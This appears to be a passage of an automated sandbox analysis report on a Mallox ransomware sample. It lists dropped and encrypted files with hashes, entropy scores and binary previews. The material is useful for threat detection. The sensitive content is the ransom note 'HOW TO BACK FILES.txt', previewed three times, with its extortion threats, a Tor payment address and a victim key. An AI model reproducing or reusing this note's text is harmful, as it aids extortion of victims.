                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files (x86)\Windows Media Player\Media Renderer\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files (x86)\Windows Multimedia Platform\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files (x86)\java\jre-1.8\lib\deploy\ffjcext.zip.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14264
                    Entropy (8bit):7.987066198103358
                    Encrypted:false
                    SSDEEP:384:Zl6DVBIpWxj+SZI72gLXGfogDQukwGyOQ:D6DV+Wm72gGfoUnkwX
                    MD5:F54B7231E253E7BB6BD9EBB4AD96EBCF
                    SHA1:8E058CAA3B9BE62FF86BCE36FA52ED4149079AA1
                    SHA-256:436C27FF9343553B2FE77750534506D74F582252FD537BED54B32F5EB78A35A2
                    SHA-512:AFA3126AE64DAEAE449B0B7AA05428E80FC509C03B90F58F2918668A705411B1065FA6F54D2C3B19FA3C5CCF96BDF3927424D2C58ECE6AAEC146747A432BF784
                    Malicious:false
                    Preview:..*.GVY;.].?q....bwm(...x.q.3.Gr.......G.M.y...S....]..!O}0..1.::......^.?..S!\j>..`.....U.(.Ke..H.<'.jPF.....(...B...:.$...G%..0...H.}..A.A.B....uCn%....l.Bb... ...0%1....>^..Q;~.5YF.r.."..p..9...).....y......S...[.....L%...o.9h.....*.{!UO.+...f.3..6.G....^.....*0.(h()..j...n."gH...,............^.uqa...-..U...w......T....?2...E$.F...I....Y@.j..y.....[~.(..K....F...?...-.:.Djsl.I......g...5.....N/n.i..G.~..A.......[..h......%jm$.e!.=S.xp..9...#.Acmk...f...T.&sS..)....7F.O.0.P^..NL?.w...2.6..u......Ef.h.zLP..N...n..|.....b.P.....M...6..H.....0V.!;:....".j...Vt.....^s...;._.3}...L0mu.{...3&M............M..z....R.~..I...:7bo....:P.L&.>].1p..........UL.k...'....>7..].f.@.w5Sw...d.r.w.3j..}.Z"`..1n#m^.i..t...\1....6p.[..7.....;.$.].....m0...$: .. .(1........Y5....*jm.......i..M5up.E0.o.8...,.....=...._..tS3;..i...;].......2.R&.K.Xy?.S.*...{o.s.......oq...J;!.M.[4..+...~+.....a......@.5...Io.....&@...5..o.......K.....C....ld9.mn...>^.oI..V..W.

                    C:\Program Files (x86)\microsoft office\root\Office16\Microsoft.Lync.Model.zip.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):91301
                    Entropy (8bit):7.997900175340737
                    Encrypted:true
                    SSDEEP:1536:Nct+v2SutNGQxO1dMF/+GzZ4KbOLNP3LRSekqNExC7IaeGYOF5+3I8+ztQfdMDDH:6+2S+MQPbbOl39GqGFtdO+iQfQXz
                    MD5:D4ED110E0E5A84BCBB4208975E601403
                    SHA1:C464C1C841E99FBDD12F89481C607649F7DF4A99
                    SHA-256:18C8F7D5EFF17856D6ADB126E66FB3824A598151B4EEE74A113BCACF5AF4B72F
                    SHA-512:F3DE584D555CC61799D095BFA601A05B74C88429EDFFB8A7A7FB7D1A08E82F860C0AECAAA3BAAC8BA52640DC1DB42B047C665DAC9C6D8E00604F6686849507BD
                    Malicious:true
                    Preview:Z2..v.;..[.....G..x.s./-......d..&J...X.5.D^i.:..Y.J1.J...T.3....".&|.....}M'.HB..'...Z.....[F.........?!.Xxq.]...|]M..<.E....6..!p.S.e.i....8..7.. ...P5.N.....U.J.....5A.t...V<.AQ>..y.j.{.NcP8@N....+...>.hk..n...s....5.L.....-..#.s.5....cDK@' '.2<... .^\Nc.....se..2.............|.....S.?/..jz.......8c.+.n6.-../N.Fr.m........^Q.j`:.yO%!...&.(."....?..:.......`.....<H..#H...."..q.._.r...`..Jt...N?...7M......$zS.2...=.c^./-/.!.I.l...0.....[.E..$W.H.[.Df.~..^.....-.........^......F8.0.....V.:_h..f,....wyM.........q.}c........"...[..^....Q.N..Q....d....`..=.yA.4d....Q..0.3.r.'}*2..|..R.Y..{...J.R.u.J....pF52.?.$.M.VeJ.y.....&........5.C.s.[u..93k...`$....&...".y....(.0....-.!.P..:...9...R..%7%....5Z8...Y.....c....Y[.u.%..^q....;4.W..q.d.NC....At..q`h[....j.y\...>.."...?.#..;n.-.}...f...J.......w..#V..w..r.!.......*....=3.;DO.l..4..#....c...-.....u.m.~.".q........S$.OE'c..g....b.Rp......|._...9?....4B_.6%.. ....../..e.v.oP....V.".;.g.

                    C:\Program Files (x86)\microsoft office\root\Office16\Microsoft.Lync.Utilities.Controls.zip.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:COM executable for DOS
                    Category:dropped
                    Size (bytes):29233
                    Entropy (8bit):7.993314684122543
                    Encrypted:true
                    SSDEEP:384:hKAODpNKhkAy1lj/D5crEANEjFqyCyYn5sKTLkLvOr3aoZ3YP9VE9pfFuAA2CxZr:IAgpXBr2rACyYzWYKowo3oAA2o3b
                    MD5:B664D3C2029976DAEC0723794AF492EF
                    SHA1:11FE11E7C04E0BFC6DD21C97129D384519550FE9
                    SHA-256:3DB6C506BA4995EE2948833EEECBD74F496A7771B24236444D0832D1BDB4E025
                    SHA-512:70F8BD81B216E399B6B36F1ADE7CABA016E4501F4A31BE2DE42F5A7755383DB364E26001860B23E21992CBF3E07D340F4B87BDC1822BBAEE6019D0FE981F2A14
                    Malicious:true
                    Preview:...N\..E..a J........+.I....E..N....!..|..&u7p\...].w.^.......O.../.^YMH....z.t...C2......B.<....-_..Q....n....&.......I.e...<9%....W......7.%.............szQ.OsHu4;%.'....,/.......@U[..X......Mt.d....R.Xtx$....U.*._.7E.9r.e +.+.x.t....(...f2.m..l.<..q.9.V.4.g....{.}..6....Dr..'e.....wP...H....6.._.^EUm~.3fl..X3......y......w.w....j._..=`,"..P...x.t..I..w.r.T..{.=....T[..zZP.....,x.0.\.Q.D.....q...vw.J....!,..2..'.;......`..3...1.#Y....={..$Z<..(..m...R<j...F..s..Bf...|.V..VdE;...{.....l.e>....o.(Z..;.....N....~...b.........-z.E.?.X...6.6.7.&...(....,..8....gR.M...0E'6....I..#.Q .....>.....m4..&qz.e.Q.........+;....ac.g.j....>..B.?...<...].[...+..\L..VU'...D..f..:G.R..Hv.. .@.S'....K....'.^..WH.J..r.4...]%.&...?D.i...S|85...#9V.E.....6.;.![.TO.....M'.2NW:...Q...4..E.......<....Z.f.c...yfh....U..o.=....|..T.T&..b..o.1.3...g.......g...SR..-.;..C.9..{ja.?..............~..{.&`8cG...elM..}x........~.;.:I..$;..6..\.Vzs..Gq....f.F....t>.>...

                    C:\Program Files (x86)\microsoft office\root\Office16\Microsoft.Lync.Utilities.zip.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):70789
                    Entropy (8bit):7.99735769972974
                    Encrypted:true
                    SSDEEP:1536:t1+eE95C8TZKeCe5aSpv2VgR3K1MFGuZhunhJi+u:t1xE95C8ow2VgRo8SW
                    MD5:300C6803A132A2CBD46F5E4F4DA85684
                    SHA1:BABE82067CBBBED7E826832CEAF456AE8DE2A1A9
                    SHA-256:D15AFF9C5AF930D4F55AF94B81FE05641970EF9FCA82393BD2513D3D614DC60B
                    SHA-512:489AE8B8EE1A8B953FE3E5310F4E4FDC918BFDCDD897DFC385C861D85A7B86ABF76A4F2F08AD71327225BBBEB519965978CB75848B5B350B05BBA1D6D52E3217
                    Malicious:true
                    Preview:.x.&.S....0,..C.j.....Zt.2.}"...0.\.:^X..z....Zs.8......s.@....#......:X.q..=..1....~.0..`..6..3.W..H.../.=.3h.d............P..1..5t.Y}w..i..a..S....7.=..~X....b.x...k.7........3.. ...5D..X...6.1u.v.q..:0.u...#..d.Zu......s /N...C0.iT.'.l...c.Q.g....;...]Nd...!Y.-.....(..a..c%.]...t.C.$?....V'.5.i;.P...5......9.V..&v...rt.......J.. i.0.p...."sM*.j.V`.G....'n..%.:."|..t....2.q..D.#.g..&>.;A...e...}....#..Z..CQ.{.....N.<......v2.../t].2.k..y_..A.>~.."..v......"A9..(..s".B.....A.G....h.k"...........t.uBP...=......j..T.....-.r}5..{9V.0{...)..."*..~.{.-U...e\.m.......j......h.|.....PQL....O.g...&..k..1..... ...<.......^...s.5w.....t...9.b.U...s.e......v.UAS........zu.*.............t.PK. R.J..%.G...N..mcHv.4..p......3c...bhz...+-.0%.E\.J88...7!XB...jbv.X.....fl.<.X..QP..q...- .Q|.1K.82.0!......7.`^..s..?..<3qW..'...==S......'.......].~..O...}.h..Iy....C.f&..0.{.Q}.D...2..8.S.z.Ge!.QX!Qzk.h....b)..5K.?i....'1N....rf.d.Y.F.6.2...=.........Fe

                    C:\Program Files (x86)\microsoft office\root\Office16\Ocomprivate.zip.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):88634
                    Entropy (8bit):7.9982799417848485
                    Encrypted:true
                    SSDEEP:1536:sk3LAB6OpPa2gYsxOVrveRXnZPblNTMRDqiWZp0LBWSTRGtbUANCR3UlNkAcA:aoOpPmYsORSnlfMRGJp0LfVGtb8hU3
                    MD5:5F2236B2302E94E29EB794079609E4C1
                    SHA1:9BA62378A56C22ADA286ED396E65BC98650BDFDD
                    SHA-256:8E16AD7BEE3814AA39A3E64E13E0AA78A6EEC4EF43A0B70B0B29E6E89656A6AF
                    SHA-512:FC9634424568DEA47E09EEB9FEEE75D205165A7ED4DEE4A671B094FC2A4E4D8A45D145DBFC1AC7525E3C851121A6F90E89ABE0C18B22D1A059474F9692EE164F
                    Malicious:true
                    Preview:...xfR......#"i:....X|t.N4y..=..+..E...........<pg..o....Oa..^8!.....I......H...[4..Yt].xrXM/.._..52.Q.*m.F.B.;...........WQr|.s...^..d|...:.I.i.#1..r .{7..J..........tk.Q$....5.x).........'D.s .h...x....1....a...*.83..6..D...WF....:A.y..).:.....=.0.w^......8..^L.....59....p..T.f...%(Q.V..S.......D.a.[.lW.Hi\.+Pa.g.-8I.p6..z.w.2D.B.0"e..5.)Jg...J..%.yhh.o....e.....6[.gK......).6i...;wX:.]..+.K......2.......jQJ....`..Eyx......nt.K7}.H.........]...MuP.8..Ud..t....:....3$."...<.{ }D.s.'...=QfG+.mq...@...7.a...?K.6.u...^/4c..s.<...`......6X...No.d..+...........>..............~.....-..5......?S%...........G......MY.h.A.....T....p.ZJ....-.V,u.e.....8/..\M>..zO..0..4........<.ZQ....V.....8%..L.-_+.....e.K..\...G.S...($..AE.;PrI5...;......d>H....*....(r..t.*nT.p......Y.....<~....%.Ey.bwS.h.)m.v"....uc..;...SX.\.....G.^..i/.....^.i.J....IX.C..*.....EP..t....... ............hG....p\'X....l1.....h....~...q(<..Lv...%VA+..p7.&.

                    C:\Program Files (x86)\microsoft office\root\Office16\System.Windows.Controls.Theming.Toolkit.zip.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):11636
                    Entropy (8bit):7.984810466194793
                    Encrypted:false
                    SSDEEP:192:LjOb6v9gSSjt7/FM15zJN9xIlQV4dA4xC432hoLxgHUOpdBkBbD2cKWHHemmdFgP:2+m5RY5FxIG0LCNTdBkPNHXmngP
                    MD5:12EE69BAC75ED8D98A477010F5D376AC
                    SHA1:4C372F2D3E78F70EED175D5D3DADC58DEBD34737
                    SHA-256:424A7AE99E23B5E668042E418441BB96B613A6584D60727868B5EEDD6449CC46
                    SHA-512:680E56DBD991409C0B00A4D5CDA20489F5064698FB0C571685E07CE5318563CAA04E9966D9C6BB8BF2BE738C226ADC33A35D4CC0AAECEB44A282CD96291935B8
                    Malicious:false
                    Preview:;.dS.....V..W/rI.....e..o.. #.5.3.Z......]..Z...=<z.9j..+.}3UiqY.C..7..ZF..!; .-s^.. ...t..i..,!.w..e.lH..9..O.!)T5|`*y..........D...?..If.)..0'.=x..@....e....r."Zm...v9...N.f..?.z........:..)0.t.6..(..C...R.5":...jB..$F.....N8.....F....1s...A...j.J...&.hu....4."aj].O..ST...0...W.G.'I.s...h.^!?>q.`e=....tifm..>.i.. [...'...>....<.O.).m.w.N.U.).B..?(.....m..Gis...N.Y.>.5.*.N..t....U3.`.O)*.....uRtz......y...MAr...fq.p2,Q...d....0....Tq.o........P.m.....[.......R..\7a..[.]...4...65..@.E+'..F......9.....]c.a.h..#P.>#.Q....h)y..#.....P.eA....|.Lv...5.n.*Z.vD..[....q.]i..H.X.u.lz./....uQ.........T..n.r{H......E.I..zE..>Y......$C....B;.u..&s.N....<.$cU+....>..>]..a.(...].p.&..R_/..p....s@..e.o"..Q.ePU.Uk^....r...Y0G.mS......Q.w`ah7.iS...0....|7x[....Sn...zQ.*..&.X...-=&h...M.....Kb...4.2.w.(!.|;.\.e\.....j.Y;...KAa?wm1...WH.0Y..P...e>......F].>........?Wzqr.F.j.J, .`..#!B...,v..?4...S.Q..:.......:..6.[.:.[./3...6..p...d..<.a*.A]a?.IhbY..q.......

                    C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\dist\en-us_web\fabric.js.gz.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):215820
                    Entropy (8bit):7.999196893739708
                    Encrypted:true
                    SSDEEP:6144:UAtM3Al0xS6iY23kh06lEOiBvozBQtmgwyt:hEAlN6iY23k26lEzBdt3xt
                    MD5:B2017B1EA5742319E823DE6C174D2AEA
                    SHA1:0A76982BCC0F28EB45EDA103848A51D95ADC295E
                    SHA-256:57608A6AC104520E91731F5BFDCAC765091F68B5B73FD6FC00AC4EB359E3B1A6
                    SHA-512:78C64CA23A807BEE2D662786AC51FECE258AEF35E66C755397CFA1A96642B29AAD0B864482FAB7C4D09E5087909F758C81298BC616EC1C56D944C1356B64C9E5
                    Malicious:true
                    Preview:7.............U.h.'S.0l.<.!|..*kS`... .......G.c.R..h.p..."h....Z?`_..mJ..`(.~(`.y}#..z...zI+v].8.73.iX...j..5..*............c.{.d..i..vma.I...2n..2BSh.A...u.)...s$C.V..Z..=T|;=....5.5.).....F...J....{..]..~...G..@lt.$...".'..\T..@.vV..<MB.. ..NJ.\...G.....m./....M.6.x..2..,...E...T..~VW-......H.i.^.o_.....5;4.!3...a*Zw!.(.NU..Pt29..}./{..._.+<p.=O..z. ....*.VI.....KO....m,...(_.tK....]..%a..2i.......B.....1......s.H..o.....))..m....I...2.l.4D.K...:...'G....#.1....0.6.Cm...^../$....D..nF\.*N9....._.\..X0.S.'.1=...7.E....Pm.8...ea.W.....$...5L..q.w.....w....u..=.?.Z.K=.p%+.:...Q.6..{f..>K...n6;`.$6....%#...z..5O.`.y.`.Q-.._b..........T...(...`.<.k|\...eQXp..y.F....K.F*.C=J@.=EHx....^t.`.....%h..M...ox.d..E.v.1...{;.Q.D.G.^&Eu_..b.@.n...@.cW....UM.=V.~...;......r...b*.Pz.u...K..`L..#[..F..s)......C+x..ae.S..n..,/.....-m.v.e... ..b..0..x..7.F.......+. ..Q....8i''...s.$..+jr.3...V.Y....Hsq..+...C....C..cl.v..O.+8...d-i.H"U..bm%.M&.r..

                    C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\dist\en-us_web\fabric.js.map.gz.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):737532
                    Entropy (8bit):7.999746944471967
                    Encrypted:true
                    SSDEEP:12288:lXMtw5MQ8DRscxoqZ6S7ybANHYKCheS5yH6gIZviIOzX7yENdy9KsNYL9d1:lXMtw5MQICzUybOkcfIZviHyQy9K0Un
                    MD5:6564CDFC1133B9830B3B2472614A8938
                    SHA1:0BE168B74E1138BD8B4544B2AACDA655ABF4424D
                    SHA-256:C39B9E560733594ADFB81DC230BAEA22163AE8353C6CDB0E47F53DA1BD858C4A
                    SHA-512:A7A3D9DD57C56B26C62D7B7A87085F76B429151A4CD8EAEFE03C36DD591565A509310ABB2ACC494A61E4A380CBF26AE6977776435A4C2571F7782BE084BF561F
                    Malicious:true
                    Preview:.n../.4......t ?:...J.{|(,.=..bx.l..@.3*.~...u^|..Ui..G...i.V.?+...@...6..w|.O.vk7.k?.iM...U.k:(..{.....9Z..M.\..r.5......^O......p.L.....o.f8...E.@.V.VM.H.K...=.......A].......X.7<.Jb2. .J..)a.?3......q..V.(....9.....F..33.K.1....A....N.H4...i......U..(w/2.._..?..I~..-...S.-.r'...>u......a.eJ.........o.F.!..MYC>.....7...(:.[...kx.%...!.....k*......._RC..f./..lM.Eu....5....osO_..R.lp.>.X..:..<i..y.......Lx..a.|].E..........:...{.W..P..r7.#..(3....'...#"..3.y..%..4\ ...'.Y.Vg.t..s....../.^......a.c.bw.....u.lQ...MQ[..P.k].u..9%.........+z.~.q...ST..79...T..`O?....&K.z..%1rA.b.N&...k.0.vO...+.LH.......s...w....F.:..-....F.K..)ik...~..{.B.d....(b.....|.)b.4@.d.K............G'tFSy..L...n_.Nf..*:.{.........Jf.$...K...f...s.$f....'.~...3..I7.Q]T._@....&...x.@.N.....U........L%...:.`.sz...2..*...z...dY8.R....(.X..}....;_.WR{...RaXd..+is...$....{cyV...]..q.s.6r1"d...V....*.%....+...p....a..TS..<C....tF.<...%..)..:...L.o.l...N5...<N...Jp}....g#

                    C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\dist\en-us_web\taskpane.js.gz.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):139001
                    Entropy (8bit):7.998787776349736
                    Encrypted:true
                    SSDEEP:3072:4kNXo/NtHMv7XkV5WQx0BJg5Xh38pCkgRcXEfy6kmRrxA:rYVtHAKwKUow/cEEf/xRVA
                    MD5:44EAE34136F5936637FA52EAB095329A
                    SHA1:922CAF10484EFA852797B774443E92DC5F6218F7
                    SHA-256:D5A51ED1674E69B7794A87BAFC964A344B8112DA269008EC264C3CAC94BAD3F1
                    SHA-512:8C5AE49EFC57D58AB36B26F0D5514B4B55CD21A4A50B596897D0F2D7E4D2C7285E1C8C2EBD01DFBA3000DD9ADADD93BB08BA8C188A50087CFE3018E535932DE2
                    Malicious:true
                    Preview:r....B.x..}.....x;.@.....$u.p.<.C...|."....u.H..3t^:.p.-.....)m.Z..db......k.3..&:..jz.._.X..T.q....$..I.....Q0.*./.._m.Ul..(.I..#OJ|......F..].;..44..f....."ycF..V..3.f...v5..-[.x.+.2..4.1....G.{._....g..E...8.yoPo}..N....p~.......J'..ep..L./.t.X.....5..O._.u...B.2..?.#.....).A...[....:.g..].j..k.+...m.N.z...]A!|xD..[....%@.......F.i..W.m....^. .G....a..}s.),...8.?..).\....V..?C..D..$d.....8.|../...<FYW}x..*jk.v....!.:T.t.W.$d....''?.........C...?d.....>......%.@...K.,...m..y.F...a.L......`..Z.mu.2..S..H...r..>=G....a.a..$........(.:....A....'....z..Z#4[.........Q..iO..F.7...'.H].'..rq:....9;..%......4...y.....:......j[.1..#.9..y-4.......Na..^KTc.1E....ugi.{.].2.p....HVve;QC....Cq.....g(.gK......j....g..8... .V..."#fdM......$..........w.... .#^)B..KsV'..M.('":........./.........v..%....*..`.p..}.^..{!.....H...q. <>.;..:..'A..7f.;..z{....:{...z....*#H.P...h2.....(|......B. ......fC-..?....Q...t...6./.$...=s`.s.......l....

                    C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\dist\en-us_web\taskpane.js.map.gz.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):320330
                    Entropy (8bit):7.999469823255787
                    Encrypted:true
                    SSDEEP:6144:ueBgk0/WydiQTkw8hW+6lNqVnytSd0jKq+UCHJFFJfdQBqc3jOF8ygneDPjQ1c:HgtW+NNq5ytSds+vHJhmqejV3neo6
                    MD5:BF425581320239D953098895933464D7
                    SHA1:E5FECB0FE0B42FE7E2565DAB971D89C4CC08CB09
                    SHA-256:0FB66334EDE8A3A118C1B539692EED722CDBB5D85210F7F96990DE1A3BC3A06E
                    SHA-512:2F8FA9315E0D1C5B984CFE78CE6A65F1BEC22438640B7308D769A87D1A602C0BC2AF4501FD7AE43B21E326FFC0387E8EA8A6FDBAB2D57CA995A9BFF2EEF811BC
                    Malicious:true
                    Preview:".tV.....H..4@.Y..2sz!......}.Ht@.y..\.sa9..m...+.U..T/..&.Y...:...b]..I<.AQ\....9].....>c...W.......L..A#.a...i..d..8./c..y.x...o.....8.K....:*...O...'@@..i...!.+..X...j.)"..b..-@.n-k..).../.gQg...$... ..!...../*F.p...G7......n.n.y.h.7(.iCA.T.._%.u..%...G......=.q..|*.W$.n,............N..Y..=..qt$.Q.FKW.Cz...=.'..n2...qb.H..7v...|.'....Y5.z(*p"....1...D.P.._........+..,U.".2...n\W.K../.h+.~.g3B.&...\."".....H..'........u~..^..L./.x..xsQ..%I~).+.d.\.x=*.2...K.X.>.M.V...sB..wJNC..y..o...KF.J....8tD.....|.8......>....k..........c.u4..Y.$)w.."fi..w.1..0.Q.U.....p...LmJ...N...P..G...)v?W.T...!...V.g..!.L..T,......<e8..R.N.HU+.G.....X?...3(...."..0.f .}..C/...^.../._B..@qC.Z.O^...7....VC..).b...@i..7Ju.H.E......~`d.g.......@.b7....s.-3Yo&M.iu..............*........#*..Fl....x:R..vS$...zx..}09j...n^..+.....S......b..SS.m.....?.o.p..[....m...'Mw.T+Ks...#h.....G..!..w.v..<.3..a...`Vg<.B..1.....K.=^.._..i-...n.] ~...G...n..DP....M...p....1eD......vN.

                    C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\dist\en-us_web\taskpanev2.js.gz.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):154390
                    Entropy (8bit):7.998607047326121
                    Encrypted:true
                    SSDEEP:3072:3MSk7lzsOapC7kiNVbuo+/980M2qvpcbQDMJHYRUpVljTRqXwVZ:3MS8WOapM4h9HOpzDe4ipVlDZ
                    MD5:1083AD6538C84F9E3D21A9836151A91B
                    SHA1:F68C6741575AD0506730E7A45225336005F44ED1
                    SHA-256:B017899F60868EB3B0DE0957AA4FC7A458ADC56BD7FAFEF3C8E5925C788A5B71
                    SHA-512:BC8867346EC286D45E0B51DC2EB00792E60FF4628BABDA12A9ED94A5C5E3DC1B06142A26083DD3479C7B265DF5A38884105B9B81191AC6BBB010073B40A0EDFE
                    Malicious:true
                    Preview:.Yl...2...BD..&F.t..Q....m..C.x..Db.p.<.G36;....X.y.ll.C...$...p..:...1..|7..\$..nP...D...;.......Uec.<.....1Y0.7.F9.G...3q.}f....AXo....ZIR+...CB.3...N.@vNs.V.!.).>.....b.E......\.{... hD...Z2..WC..~.xu*.....H.~..0b..>.g.m.'...6......,.Z.:..|m.....7.g.5..5q...(...%....*.DM+.n.z:......K...`../f.E.P._;..d....,...'..lV....0!...U".P...a..x.p<....X.......4e...Z....d.-......2.v"SU......)".D=-..G....V..6.^;$.>........Z.U..Y...!.YJ.:_....c.1....$"..,Uv&......h...#..du...I...ujQ....WE...W;u..=@.j..s..S....b.J..Q.v........b...yS......u$.V.<.....D...U....7,..Ff^....$4![v.J.U..k.$..?....D.P..J;.BdSg.\.;..9UB.K.w..!;.R.K:P..,..|..k4...7@.....c.d..ES...4/......a........j.>Z...).~x......5..u..[...Z.pz..a:.So..r..R..`.....Rm.:.v.1..y....+...EV .-:.u..df>..'o5.N.:...U..*..Nm...z{.-=.Q.%Q^a.*..oy...."Z.VI}9.s2.4..1..|ju..j'..&x?.Z.x.- ....eyN....7Z.....>.)&/..0~..(.gz...}....H....S1\...N`.4Rb..D.T-.X|1...r......Q.(D..}.A..Q=..c..l......1..U..C...>,...@..

                    C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\dist\en-us_web\taskpanev2.js.map.gz.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):358562
                    Entropy (8bit):7.999502381704687
                    Encrypted:true
                    SSDEEP:6144:TW+I86A5vUPvaWIS2dVTWOTvWKXyO/i0kxfzjoUW58YEMJdyp3lH:TxInA5vUPv1ETWOTe5Qi0ifA1+1H
                    MD5:FE1DD401FEBC0161DA931F1C5AF1D80F
                    SHA1:9AEA2211495AEAD962FB81D82C9A209955D1F229
                    SHA-256:A7793E7A7E4002CAFD60CC68CB76653EFF2BFB87BCB52609F1C808189BB3AA94
                    SHA-512:86DE27C00440D9A9F3F43A0833BC07F8510A98A3C16AE217E54001678415284EFEF60336E29A0A7BAB91203574F16A785141DD551532071DA32AE11F4D00C7F4
                    Malicious:true
